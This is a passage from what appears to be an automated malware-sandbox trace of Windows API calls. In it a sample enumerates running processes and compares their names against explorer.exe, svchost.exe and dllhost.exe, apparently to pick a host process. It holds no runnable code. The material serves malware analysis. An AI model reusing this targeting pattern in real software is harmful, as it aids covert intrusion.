dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0245.149] CloseHandle (hObject=0xd4) returned 1 [0245.149] Sleep (dwMilliseconds=0x3e8) [0246.169] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0246.171] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0246.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0246.171] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0246.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0246.172] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0246.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0246.172] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0246.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0246.173] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0246.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0246.173] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0246.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0246.174] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0246.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0246.174] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0246.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0246.175] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0246.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0246.175] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0246.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0246.176] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0246.176] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0246.177] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0246.177] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0246.178] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0246.178] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0246.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0246.179] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0246.179] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0246.180] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0246.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0246.180] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0246.180] CloseHandle (hObject=0xd8) returned 1 [0246.180] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0246.180] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0246.180] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0246.180] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0246.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0246.181] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0246.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0246.181] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0246.181] CloseHandle (hObject=0xd8) returned 1 [0246.181] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0246.181] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0246.181] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0246.182] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0246.182] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0246.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0246.183] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0246.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0246.183] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0246.183] CloseHandle (hObject=0xd8) returned 1 [0246.183] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0246.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0246.184] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0246.184] CloseHandle (hObject=0xd8) returned 1 [0246.184] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0246.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0246.184] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0246.184] CloseHandle (hObject=0xd8) returned 1 [0246.184] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0246.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0246.185] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0246.185] CloseHandle (hObject=0xd8) returned 1 [0246.185] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0246.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0246.185] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0246.185] CloseHandle (hObject=0xd8) returned 1 [0246.185] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0246.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0246.186] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0246.186] CloseHandle (hObject=0xd8) returned 1 [0246.186] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0246.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0246.186] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0246.187] CloseHandle (hObject=0xd8) returned 1 [0246.187] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0246.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0246.187] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0246.187] CloseHandle (hObject=0xd8) returned 1 [0246.187] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0246.188] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0246.188] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0246.188] CloseHandle (hObject=0xd8) returned 1 [0246.188] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0246.188] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0246.188] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0246.188] CloseHandle (hObject=0xd8) returned 1 [0246.188] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0246.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0246.189] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0246.189] CloseHandle (hObject=0xd8) returned 1 [0246.189] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0246.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0246.189] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0246.189] CloseHandle (hObject=0xd8) returned 1 [0246.189] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0246.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0246.190] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0246.190] CloseHandle (hObject=0xd8) returned 1 [0246.190] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0246.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0246.190] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0246.190] CloseHandle (hObject=0xd8) returned 1 [0246.191] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0246.191] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0246.191] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0246.191] CloseHandle (hObject=0xd8) returned 1 [0246.191] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0246.192] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0246.192] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0246.192] CloseHandle (hObject=0xd8) returned 1 [0246.192] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0246.192] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0246.192] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0246.192] CloseHandle (hObject=0xd8) returned 1 [0246.193] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0246.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0246.193] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0246.193] CloseHandle (hObject=0xd8) returned 1 [0246.193] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0246.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0246.194] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0246.194] CloseHandle (hObject=0xd8) returned 1 [0246.194] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0246.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0246.194] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0246.194] CloseHandle (hObject=0xd8) returned 1 [0246.194] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0246.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0246.195] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0246.195] CloseHandle (hObject=0xd8) returned 1 [0246.195] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0246.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0246.195] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0246.196] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0246.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0246.196] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0246.197] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0246.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0246.197] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0246.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0246.198] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0246.198] CloseHandle (hObject=0xd8) returned 1 [0246.198] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0246.198] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0246.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0246.198] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0246.198] CloseHandle (hObject=0xd8) returned 1 [0246.198] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0246.198] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0246.198] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0246.198] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0246.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0246.199] Process32Next (in: hSnapshot=0xd4, 